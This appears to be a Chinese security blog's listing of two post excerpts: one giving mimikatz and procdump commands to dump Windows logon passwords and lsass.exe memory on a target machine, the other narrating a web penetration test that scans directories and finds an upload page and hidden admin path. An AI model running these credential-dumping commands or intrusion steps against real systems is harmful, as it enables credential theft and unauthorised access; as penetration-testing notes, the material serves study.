摘要:
1.mimikatz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >>1.txt exit 2.procdump 1、在目标机器上执行 procdump.exe -accepteula -ma lsass.exe 阅读全文
摘要:
扫目录发现 http://www.xxx.test.cn/bak/以及/bak/upload.jsp 上传抓包看返回包,没有回显路径 于是盲猜找上传文件夹,无果。回到bak目录发现可疑js 访问bak/login_js/login.js 找到一处后台地址 访问/bak/admin_manager1/ 阅读全文